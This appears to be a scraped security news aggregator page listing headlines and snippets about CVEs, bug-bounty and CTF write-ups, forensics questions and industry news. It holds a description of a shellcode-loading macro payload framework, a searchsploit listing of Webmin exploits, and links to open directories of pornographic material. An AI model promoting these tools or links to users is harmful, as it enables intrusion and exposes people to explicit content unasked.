  • Open

    CVE-2021-45608 – NetUSB RCE Flaw in Millions of End User Routers
    Article URL: https://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers/ Comments URL: https://news.ycombinator.com/item?id=29897289 Points: 3 # Comments: 0  ( 6 min )
    Windows HTTP Protocol Stack RCE Vulnerability (CVE-2022-21907)
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=29896565 Points: 3 # Comments: 2
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    Article URL: https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038 Comments URL: https://news.ycombinator.com/item?id=29891670 Points: 1 # Comments: 0  ( 24 min )
  • Open

    Finding vulnerabilities in LoRaWAN's Protocol Stacks: Emulation with Qiling/Unicorn, P-Code emulation with Ghidra and AFL++ Fuzzing (Quick summary + complete 40 pages paper)
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
    How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more.
    submitted by /u/jat0369 [link] [comments]
    Risk-aware applications
    submitted by /u/TolgaDevSec [link] [comments]
    Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivy’s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.
    submitted by /u/tylous [link] [comments]  ( 1 min )
    CVE-2021-41577: MITM to RCE in EVGA Precision X1
    submitted by /u/hackers_and_builders [link] [comments]  ( 1 min )
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
  • Open

    How I downed acronis.com in 2 minutes — Lucky bug write up
    Hi bug hunters!! Continue reading on Medium »  ( 1 min )
    Linux Privilege Escalation Resources
    hey, guys, ’s I hope you doing well. Today I share some Linux priv esc resources That help you in solving CTF and in web-pentesting and… Continue reading on Medium »  ( 1 min )
    ODDZ Incentivized Testnet : Airdrop And Bug Bounty Program
    Oddz Finance’s Options V1 Already Live On Binance Smart Chain Mainnet And Completed Testnet On Polygon Matic Chain. Continue reading on Medium »  ( 1 min )
    COOKIES: AN EYE-OPENING GUIDE
    Cookies are tiny pieces of data or information that are locally stored on your computer that are sent to the server when you make a request Continue reading on Medium »  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control Continue reading on InfoSec Write-ups »  ( 2 min )
    Mintverse Beta 2.0 Bug Bounty Program
    Dear Mintverse community, Continue reading on Mintverse »  ( 2 min )
    Bug Bounty Methodology - Web Vulnerabilities Checklist
    Hello guys, it’s me again. I know malware analysis might be boring because of debugging and code analysis especially for the people who… Continue reading on Medium »  ( 2 min )
    Starting My Journey
    Hi Welcome to Bug University, I welcome you all to my blog site… Continue reading on Medium »
    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Admin Login Bypass in a Coaching system
    Hello readers I am Aditya , Recently hunting around in a coaching site I found a critical bug at… Continue reading on Medium »  ( 1 min )
  • Open

    Red Team vs Blue Team: understand the difference
    Just as a football team has attack and defense, the idea in cybersecurity is similar. Continue reading on Yaman Tecnologia »  ( 2 min )
    OFFENSIVE SECURITY TOOLS FOR PENTESTING & RED TEAM OPERATIONS
    Every so often I post a tweet on Twitter asking for people’s arsenal of different tools whether for security, coding or whatever. Continue reading on Medium »  ( 1 min )
  • Open

    Prototype pollution via console.table properties
    Node.js disclosed a bug submitted by rugvip: https://hackerone.com/reports/1431042
  • Open

    Kernel ROP gadgets ARM
    Hello guys, I am trying to port a kernel exploit and I need to find rop gadgets from vmlinux. This is not accessible in the target and as far as I understand uboot loads the vmlinux on boot, but this restricts me from easily finding the gadgets I need. Is there any resource you can suggest as I'm clearly missing something and my research till now didn't give me clear answers. Thanks :D submitted by /u/Cr0wTom [link] [comments]  ( 1 min )
    Wfuzz VS ffuf - Which one is the faster web fuzzing tool? [Web Security #1]
    submitted by /u/pat_ventuzelo [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-11 Review
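    Malicious Website Identification with a GCN Model Based on a Heterogeneous Graph of Cross-Site Redirects and Text Data by ourren Detecting Reflection-Amplification DDoS Attacks at Internet Exchange Points by Avenger For more of the latest articles, visit SecWiki  ( 2 min )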
  • Open

    Career growth and related certification
    I've been working as a security tester (pentester) for about a year. I've done CEH V10 and this year I really want to be improved bling on my resume tbh. I am currently doing web mobile pos testing. Your help would be really appreciated in suggesting good value for money and information certificates. I know OSCP is there but I need more hands on for that which I am working on but in the mean time don't want to lose time. I have a potential interest in cloud security but also open to other fields and certification. submitted by /u/light_striker12 [link] [comments]  ( 2 min )
    Tips for making malware lab for school project
    Going to use https://github.com/ytisf/theZoo malwares. Maybe use Splunk to write alerts, queries etc to identify the malwares. (Problem is that it only got 60 days trial, need at least for 6 months) Should I be worried for VM escape, if I run these malware in a secure VM environment? What should be the main focus of this project. Run the malware then just identify them with alerts and write writeups? Would this idea be great for a university project for 6 months? submitted by /u/PapiPoseidon [link] [comments]  ( 3 min )
    Strange log activity
    Has anyone ever seen windows event 1102 (The audit log was cleared) activity on a windows server that was performed by SYSTEM? It happened on a test vm I built and I can't figure out why that would happen. I have backups of the logs and compared the logs on the server with the backup and a few 100 logs were deleted but they were future dated logs (which doesn't make sense). I'm sure it's not a timezone issue, the logs were dated 15 hours into the future. Almost like they were a mistake and the system fixed it? I have basically nothing running on the server (something I built for testing) but would love to understand what happened. Thanks! submitted by /u/forthebeer2000 [link] [comments]  ( 1 min )
    How to remove root certificates from work
    I recently started a new job at a government facility with a BYOD policy at work. Without thinking, I used my personal phone and logged in to the wifi which required me to accept root certificates. I am now aware that all my traffic can be decrypted and anything on my personal phone can be monitored on any network. I wish to keep my personal privacy and use a separate device for work now. How can I reset my phone to remove the root certificates? As I understand it, a standard factory reset may not work if the cert provided superuser permissions. Would a stock ROM install remove the root cert? submitted by /u/lloptty774 [link] [comments]  ( 1 min )
  • Open

    Invicti Security Names Jeff Bray Chief Financial Officer
    Invicti Security today announced seasoned financial executive Jeff Bray has joined the company as Chief Financial Officer. Bray brings decades of experience leading world-class finance teams in both private and public software companies and will lead all aspects of Invicti’s financial operations. READ MORE  ( 2 min )
  • Open

    Real or Fake? How to Spoof Email
    I briefly mentioned how easy it is to forge email sender addresses in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into why email sender addresses are so easy to forge and... The post Real or Fake? How to Spoof Email appeared first on TrustedSec.  ( 14 min )
  • Open

    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
    Generating & Analyzing Shellcode with Radare2
    submitted by /u/DLLCoolJ [link] [comments]  ( 1 min )
  • Open

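    About That Time I Was Learning Pentesting: Java Deserialization - the CB Chain
    Strictly speaking, this article is part of my study notes from learning Java exploit chains.  ( 1 min )
    An Article About PHP Deserialization
    An article about PHP deserialization.  ( 1 min )
    FreeBuf Morning Briefing | Multiple EA Sports FIFA 22 Players Hacked; E-Waste Is Also a Cybersecurity Issue
    Several EA Sports FIFA 22 players appear to have been hacked and say they have lost access to their personal EA and email accounts.  ( 1 min )
    Interview with the Head of Alibaba Cloud SASE: Making Workplace Security Simpler
    Can SASE really deliver on Gartner's prediction that it "can replace existing network and security models"? How was Alibaba Cloud SASE built, and what changes can it bring to enterprises?  ( 1 min )
    Europol Ordered to Delete Data Unrelated to Criminal Investigations
    On January 3, the European Data Protection Supervisor required Europol to delete the large volume of personal data it stores that has no clear link to criminal investigations.
    Multiple EA Sports FIFA 22 Players Attacked
    A growing number of EA Sports FIFA 22 players, including well-known streamers, report that their EA accounts were hacked and that they cannot access their personal EA and email accounts.  ( 1 min )
    Facebook Launches "Privacy Center" to Educate Users About Data Collection and Privacy Options
    Its maze-like menus and obscure wording leave people no choice but to doubt its effectiveness at protecting user data.  ( 1 min )
    The Contest Between "Immunity" and "Virus" in Cyberspace
    Cyber risk, like "patient zero", is a moving research subject that is not easily pinned down in one shot; it requires step-by-step progress through searching, judging, affirming and self-negation, which is the process of coming to understand the "virus".
    The "Fragile" Internet of Vehicles
    Compared with the fast-moving Internet of Vehicles industry, Internet of Vehicles security is clearly slow, painstaking work; carmakers must learn to slow down and dig in before they can truly solve its security problems.  ( 1 min )
    2021 Cryptomining Trojan Trend Report
    Using cloud-side data, the Sangfor threat intelligence team has continuously tracked active cryptomining trojan families, detected multiple cryptomining trojan outbreaks, and from them analyzed and summarized several development trends for cryptomining trojans.  ( 1 min )
    On the Definition of Important Data in Light of China's Existing Laws and Regulations
    2021 is over. At the end of the year I looked back on what I had done over the year, and what left the deepest impression was probably the term "data security".  ( 1 min )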
  • Open

    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Lot Of IT-Related Books.
    https://doc.lagout.org/ submitted by /u/AdministrativeDig391 [link] [comments]  ( 1 min )

  • Open

    Trying to find a way to see when a user account that is now deleted, was first created. Is that possible?
    So the HDD, which ran XP, doesn’t boot anymore. I can access the files however. I’m trying to find when a specific account was created on this drive. It was created from the original admin account, which also was deleted and replaced later on. The user account files of the first admin account were saved, but nothing of the account that I’m looking for. The guest account is still the same guest account with files from when it used to be mine. So it wasn’t factory reset or anything. Am I out of luck for figuring out when the deleted account I’m looking for was created? submitted by /u/Pubh12 [link] [comments]  ( 2 min )
    Deleted texts in an iTunes backup
    Hi all, I believe I already know the answer to a hypothetical scenario but I wanted some clarity on deleted texts via an iTunes backup. From a general perspective, say a user has a modern iPhone and deleted hundreds of text messages then backed up their iPhone using iTunes. Would some or even most of those deleted texts be found in the backup? I realize time and usage of the iPhone would affect what may get backed up, but let’s say they deleted a bunch of texts then created the iTunes backup right after. I imagine since the entire sms.db is getting backed up, the texts marked for deletion would still reside in the database / get backed up. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]  ( 2 min )
  • Open

    Active Directory Privilege Escalation (CVE-2021–42278)
    This post discusses how CVE-2021-42287 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any The post Active Directory Privilege Escalation (CVE-2021–42278) appeared first on Hacking Articles.  ( 4 min )
  • Open

    What is an SS7 attack and how does it work?
    I made the post about the IMSI Catchers and someone brought this up. submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    I clicked a phishing scam link.. can I get rid of the program it downloaded on my iPhone?
    I clicked a link in a text it downloaded something on my phone that I can’t find. My iPhone can’t make calls now.. I double clicked my home button during a call and something glitched.. I saw an app open that is not showing on my phone, it was transparent and said “screen sharing”. I wasn’t able to go into the app then it disappeared. I’m 99% sure someone can see everything I do on my iPhone. Do I need to go to T-Mobile and get a new phone? Edit: every time I make a call it fails and the speaker/audio button is always not able to be selected. But the speaker button will turn on then call fails. Here is a picture of the screen sharing: https://imgur.com/a/HjsY767 submitted by /u/Acrobatic-Path2242 [link] [comments]  ( 2 min )
    remote network pentest connectivity
    Hello Netsec engineers, I have an 'internal' remote pentest coming up for a client who doesn't have a spare computer in their office or a virtual computer. They would like to simulate an attack as if someone walked into the office and dropped a raspberry pi. I have a laptop ready for deployment that will be connected via lan in the client's office, what would be the best way for me to remote into the laptop? In the past I've used Team viewer but that hasn't been great display wise, the reliability never dropped though which is the most important. Would it be worth getting a VPS and configuring my own VPN using openvpn for tests like this? submitted by /u/HotHeadStayingCold [link] [comments]  ( 4 min )
    SANS SEC560 (Network Penetration Testing and Ethical Hacking) Preparation?
    My job is offering to pay for a SANS training of my choice. I passed the SEC401 earlier this year but I have no experience with penetration testing or anything of the sort. I realize I'll have to fill some information gaps myself to get the most out of this course. Where should I start? Thanks in advance. submitted by /u/Lorian-onii-chan [link] [comments]  ( 1 min )
    Another Microsoft account has established ownership of number message?
    got this message was I hacked? or is there something I am missing Another Microsoft account has established ownership of 12176. If you no longer own 121176, we can help you set up another sign-in name the next time you sign in to your Microsoft account. If 12176 still belongs to you, we can help you reclaim it. I cut out the number just in case I actually had this number at one point but what does this mean. I already suspect my brother is behind this because we are at war and he has accessed my Gmail constantly, and I just removed a few devices from my Gmail because it said I had a MacBook which I don't and he's in the IT field, and has google nest in our house he bought for our mother I'm thinking he's manipulating that to steal my credentials as well but I'm not sure. So long story short I cleaned up all possible security breaches my chump brother might have had control over and this happens I'm thinking he was on my Microsoft account because he jumps in my online COD Lobbys with lame attempts to insult me lol submitted by /u/TheGoodJosh [link] [comments]  ( 1 min )
    Best way to inspect IoT device traffic?
    I also suppose the biggest challenge would be getting the devices to trust a self signed certificate. submitted by /u/earthlyaeon [link] [comments]  ( 1 min )
  • Open

    Another MSX directory.
    http://www.msxarchive.nl/pub/msx/ submitted by /u/EmuAnon34 [link] [comments]
    micro bikini oil dance collection
    http://www.wo-fd.xyz/?/Microbikini%20Oily%20Dance%20Ultimate%20Collection%20%5BOmega%20P%5D/ ​ And a butt load more xxx up 1 directory https://preview.redd.it/446vp7vpkta81.png?width=1920&format=png&auto=webp&s=964e053e72ab80490463e4acdb150f24b59acfec submitted by /u/Hyp3rionX [link] [comments]
    xxx od
    http://107.178.111.146:9999/ gay porn submitted by /u/Hyp3rionX [link] [comments]
  • Open

    Abusing terminal emulators with ANSI escape characters can lead to remote DDoS, character injection and more.
    submitted by /u/jat0369 [link] [comments]  ( 1 min )
    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    ProtonVPN TCP Acceleration SYN+ACK Spoofing Analysis
    submitted by /u/netsecfriends [link] [comments]  ( 2 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    Must-Have Tools For Hacking
    submitted by /u/banginpadr [link] [comments]
  • Open

    FTC Says Fix Log4j Security Vulnerability or Face Its Wrath
    Article URL: https://thenewstack.io/ftc-says-fix-log4j-security-vulnerability-or-face-its-wrath/ Comments URL: https://news.ycombinator.com/item?id=29879106 Points: 3 # Comments: 0
    New macOS vulnerability, “powerdir,” could lead to unauthorized user data access
    Article URL: https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/ Comments URL: https://news.ycombinator.com/item?id=29879030 Points: 5 # Comments: 0  ( 11 min )
  • Open

    Chrome 98 Beta: Color Gradient Vector Fonts, Region Capture Origin Trial, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 98 is beta as of January 10, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android.  COLRv1 Color Gradient Vector Fonts In this version Chrome supports COLRv1 color gradient vector fonts as an additional new font format. A color font contains glyphs with multiple colors in them, which can be for example an emoji or a country flag or a multi-colored letter. COLRv1 is an evolution of the COLRv0 font format intended to make color fonts widespread on the web. COLRv1 fonts bring expressive visua…
  • Open

    OSINT Challenge — find the mural
    I have stumbled upon the Twitter account of OSINTDojo and their challenge to find a certain mural along with the respective artist… Continue reading on Medium »  ( 2 min )
    TryHackMe — OhSINT Walkthrough
    OhSINT is a free room on the TryHackMe platform. The objective of this challenge is to use open-source intelligence techniques to obtain… Continue reading on Medium »  ( 2 min )
  • Open

    FTC words of warning: Remediate recent Log4j vulnerabilities or face consequences
    The FTC has issued a warning to companies straggling behind on Log4j: remediate this flaw or face legal consequences. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    SecWiki News 2022-01-10 Review
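    SecWiki Weekly (Issue 410) by ourren Rootkit Research Series: Highly Stealthy, Highly Persistent Threats on the Windows Platform by ourren Top Ten Typical Cases of Personal Information Infringement in 2021 by ourren For more of the latest articles, visit SecWiki  ( 2 min )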
  • Open

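    "Cybersecurity Knowledge Continent" 1.0 officially launched!
    The official 1.0 release of "Cybersecurity Knowledge Continent", which gathers quality content into a one-stop platform, has arrived.
    FreeBuf Morning News | Ministry of Public Security publishes ten typical personal-information crime cases; Facebook launches Privacy Center
    Public security organs nationwide solved more than 9,800 cases of infringement of citizens' personal information over the year, arrested 17,000 suspects, and published the ten typical cases of crimes infringing citizens' personal information in 2021.  ( 1 min )
    Attacking the SNMP service in practice
    The SNMP service in switch security configuration  ( 1 min )
    "Bookmark edition" roundup: policies and regulations, national standards, reports and white papers of 2021
    This article comprehensively compiles the major domestic policies and regulations issued in 2021, some national standards, and the research reports and white papers of major institutions.  ( 1 min )
    Casual talk: three-administrator management under classified protection
    The system administrator, audit administrator and security administrator roles must not be held by one person; ideally three people hold them separately.
    "Shanghai Counter-Espionage Security Precautions Regulations" released, taking effect January 1, 2022
    The "Shanghai Counter-Espionage Security Precautions Regulations" comprise seven chapters and thirty-five articles, further improving the legal system for counter-espionage security precautions and safeguarding national security in accordance with the law.
    Night Sky, a new ransomware targeting enterprises
    Security researchers recently warned that a new ransomware called "Night Sky" is active; it targets corporate networks and steals data in double-extortion attacks.  ( 1 min )
    Online booking platform FlexBooker leaks data of more than 3.7 million accounts
    FlexBooker advises users to stay vigilant and review account statements and credit reports for suspicious transactions.  ( 1 min )
    Gin-Vue-admin vertical privilege escalation vulnerability and code analysis - CVE-2022-21660
    Users get the chance to exceed their privileges ultimately because of a logic problem in the code.  ( 3 min )
    France fines Google and Facebook a massive 210 million euros for violating privacy rules
    France fined Facebook and Google 150 million euros and 60 million euros respectively, on the grounds that they did not give users a simple option to refuse cookie tracking technology.  ( 1 min )
    Reverse engineering tutorial (3): four ways to quickly locate specific code
    When debugging code, the main() function is not located directly at the executable's EP; what appears there is the startup function generated by the development tool (Visual C++).  ( 1 min )
    Reverse engineering tutorial (1): debugging code
    This series of articles is a summary aimed at those getting ready to start reverse engineering. Come and learn together!  ( 1 min )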
  • Open

    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Exploiting Execute After Redirect (EAR) vulnerability in HTB Previse
    Exploiting Execute After Redirect for fun and profit?? Continue reading on InfoSec Write-ups »  ( 2 min )

  • Open

    searchsploit vs msfconsole exploit names
    Hi! Let's say I am looking for some webmin exploit through searchsploit: searchsploit webmin ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | cgi/webapps/23535.txt phpMyWebmin 1.0 - 'target' Remote File Inclusion | php/webapps/2462.txt phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | php/webapps/2451.txt Webmin - Brute Force / Command Execution | multiple/remote/705.pl webmin 0.91 - Directory Traversal | cgi/remote/21183.txt Webmin …  ( 2 min )
    I've read about IMSI catchers being a security threat, but I'm not sure I should actually be worried about them. If someone grabbed an IMSI# with an IMSI catcher, how would they get any usable information about me? Is my personal information at risk or is this just a random unusable string to most?
    The paper that drew this to my attention: https://arxiv.org/pdf/1510.07563.pdf Corresponding article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ In the paper, it claims that they can pull IMSI and IMEI off of smartphones, but I see no claim of knowing what the number or name of the phone is. If all they have is an IMSI and IMEI, am I really at risk? Is it usable information to have these numbers to a person who is undefined. Like, if someone stole my gmail password without knowing who I was or my account name, they could try it in every gmail account starting at a@gmail.com, but that might take a long time. Right? So the question is basically, is there actually a danger present in having my IMSI and IMEI accessed due to either the release of the information itself or in that there might be a way to connect it to me that I'm not aware of? I tried looking through Wikipedia for an answer. It's either not there or I'm too dumb. Either way I'd appreciate help in my paranoid quest for knowledge if any Redditors would be kind enough to offer it. tl;dr: What can an IMSI catcher know? & What can the operator do with that information? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Looking for resources on detection engineering
    Hi there, I am trying to develop myself in detection engineering, have you got any interesting resources on the topic? Cheers submitted by /u/zakibros [link] [comments]  ( 1 min )
    I know that Stingrays can capture IMSI #s from nearby smartphones. Can they also capture phone numbers and personal data too or is it just the serial number?
    I know the authorities might have a database, but let's say a hacker picked up my smartphone with an IMSI catcher. They really know nothing right? Because they can't extract anything useful from that, right? Is that true or am I being naive. I read a paper that claimed that the extraction of IMSIs from smartphones was a security threat, but without a phone number, it doesn't seem all that useful to them. Article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ Paper: http://go.redirectingat.com/?id=100098X1555750&xs=1&url=http%3A%2F%2Farxiv.org%2Fabs%2F1510.07563&sref=rss submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    how does a malware call back using DGA DNS?
    I was reading more into the solarwinds hack and I noticed that the malware called back home using a DGA DNS algorithm, but I'm struggling to understand how did the hackers know which domain to buy/use for their malware? Based on the article: https://en.wikipedia.org/wiki/Domain_generation_algorithm I can understand how the malware generates the domain names but how does c2 and malware meet at a certain domain name? Especially if the malware generates 50k domains? submitted by /u/ak_z [link] [comments]  ( 3 min )
    OK what’s the Reddit hack to wear you can’t send a private message because it thinks you have over 100 letters of tax this is currently going on I was banned for some thing I have no clue of why trying to figure this out
    submitted by /u/itwasEMOTIONALmurder [link] [comments]
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 1 min )
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 2 min )
  • Open

    Authentication Bypass & ATO
    Hi guys this is Karthik. I hope you all are doing good. I’m back with another interesting write-up “Authentication Bypass which leads to… Continue reading on Medium »  ( 1 min )
    Get your own Hacking VPS for free in 2022!!
    Introduction Continue reading on Medium »  ( 3 min )
    Host Header Injection Lead To Account Takeover
    Hello amazing hacker, Today, I want to talk about one of my finding in private pentest program that lead me takeover other user account by… Continue reading on Medium »  ( 2 min )
    PHP Type Juggling Vulnerability
    In the name of God, the Most Gracious, the Most Merciful Continue reading on Medium »
    STORED XSS
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    2FA bypass by reading the documentation
    This is a fairly simple and short writeup, but i think is worth sharing, so lets get started. Continue reading on Medium »  ( 1 min )
  • Open

    blog/wp-json/wp/v2/users FILE is enable it will used for bruteforce attack the admin panel at blog/wp-login.php
    Mail.ru disclosed a bug submitted by kassem_s94: https://hackerone.com/reports/1403302
  • Open

    Subpoenaed iPhone and delay in turning it over to police--general outline of what can be lost in this delay?
    Ongoing case with Alec Baldwin and on set shooting that resulted in death. Phone was subpoenaed in mid December, still hasn't been turned over. Link to subpoena in comments. Cell carrier is Verizon. By delaying, I would think anything he has deleted will be much harder to recover, since the memory will be overwritten? Any general information or thoughts would be appreciated. submitted by /u/bbsittrr [link] [comments]  ( 3 min )
    Forensic computers
    Does anyone have experience with Siforce forensic workstations? How do they compare to Sumuri Talinos? submitted by /u/HorseAdministrative7 [link] [comments]  ( 2 min )
  • Open

    Hear No Evil: An Introduction to Audio File Analysis for OSINT
    It’s a new year, and that also means new blog posts about all things OSINT and Digital Forensics. In this one, we’re going to dive into… Continue reading on Medium »  ( 5 min )
    Certified in Open Source Intelligence (C|OSINT) Review
    Certification for OSINT Professional Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-09 Review
    No news updates today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on System Weakness »  ( 8 min )
    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on Medium »  ( 7 min )
  • Open

    potato journal articles
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/soupcreamychicken [link] [comments]

  • Open

    Differential Fuzzing for Smart Contract VMs
    Article URL: https://github.com/fgsect/NeoDiff Comments URL: https://news.ycombinator.com/item?id=29857384 Points: 2 # Comments: 0  ( 2 min )
    Smart Contract VM Bugs via Differential Fuzzing [pdf]
    Article URL: https://raw.githubusercontent.com/fgsect/NeoDiff/main/roots21-2.pdf Comments URL: https://news.ycombinator.com/item?id=29850086 Points: 2 # Comments: 0  ( 119 min )
  • Open

    My OD full of japanese music and more.
    http://193.104.197.109/ submitted by /u/Connor_CZ [link] [comments]
  • Open

    From email to Github accounts
    While searching lately for new OSINT techniques on Github, I have found an old repository entitled “enumerate-github-users” by antnks. Continue reading on Medium »  ( 1 min )
    Understanding Web Fuzzing for Ethical Hacking
    Websites have unique addresses just like your home address known as a Uniform Resource Locator (URL). If multiple entities shared one… Continue reading on Medium »  ( 2 min )
    Weaponizing Information: To the Agitator Go the Spoils of OSINT
    *Note: This article was originally published by the author on March 9, 2020. Continue reading on Medium »  ( 5 min )
    The OSINT-ification of Job Boards: Hunting the Hunters
    *Note: This article was originally published by the author on July 2, 2019. Continue reading on Medium »  ( 11 min )
    How I Used OSINT to Find an Abandoned Hotel
    Continue reading on Medium »  ( 3 min )
    Applying OSINT Tactics to Twitter
    Allow me to begin by stating that the accounts (and tasks) depicted in this article were created for the purpose of OSINT education… Continue reading on Medium »  ( 3 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using NTQuerySystemInformation
    Get acquainted with the undocumented low-level yet powerful APIs from winternls and how to use the NtQuerySystemInformation function to get a list of all the processes running in the system. https://tbhaxor.com/windows-process-listing-using-ntquerysysteminformation/ submitted by /u/tbhaxor [link] [comments]
    Get expert training on advanced hunting
    submitted by /u/dmchell [link] [comments]
  • Open

    MSRC researcher recognition and CEO of DSPH at 18 years
    Hi everyone,  It was 7 January 2022 when I woke up from sleep I saw an email from MSRC i thought it must be related to the vulnerability… Continue reading on Medium »  ( 1 min )
    Research on Host Header Injection — Cyber Sapiens Internship Task-11
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Research on XML eXternal Entity Injection (XXE)-Cyber Sapiens Internship Task-10
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    Research on HTML Injection- Cyber Sapiens Internship Task-9
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    IDOR: A BEGINNER’S GUIDE
    IDOR is a type of access control vulnerability. IDOR vulnerability can occur when user-supplied input is received by the web server to ret Continue reading on Medium »  ( 2 min )
    How to remove crap using ‘cut’ cmd from Httprobe output?
    Default output from httprobe looks like; In certain conditions as ➖ Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-08 Review
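    Useful Useless Models: Modeling Methods for Complex Problems in Cybersecurity by ourren New APT Trend: Growing Use of Strategically Dormant Domains, Hard to Detect by ourren Summary of the 2021 Cybersecurity Industry Landscape by ourren Development Trends of Major Global Cybersecurity Threats in 2021 by ourren For more of the latest articles, visit SecWiki  ( 2 min )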
  • Open

    How does SAMBA differ between NULL authentication and anonymous authentication?
    Context: I am a penetration tester and I am trying to learn more deeply about SMB. I use the tool crackmapexec to enumerate SMB, and I recently came across something weird when trying the following commands: - crackmapexec smb IP This sets the Domain name, User name, and Host name to NULL - crackmapexec smb IP -u '' -p '' This sets the Domain name, but sets the User name, and Host name to NULL - crackmapexec smb IP -u 'anything' -p '' This sets the Domain name, User name, and Host name This made me wonder, why does SAMBA treat any username as an anonymous login? Question: I've been looking through the SAMBA documentation (which is horrible someone please change this), to find what allows/disallows NULL and anonymous authentication. However, I have been unable to find what settings allow these. submitted by /u/jakeyee [link] [comments]
    book suggestions for highly technical subjects
    Hi Reddit, I'm looking for books similar to The ShellCoder Handbook but with updated contents. I'm focused on the exploit dev part. But anything else is also fine as long as it's highly technical. submitted by /u/ak_z [link] [comments]
    Spyware paranoia and tools to use to scan
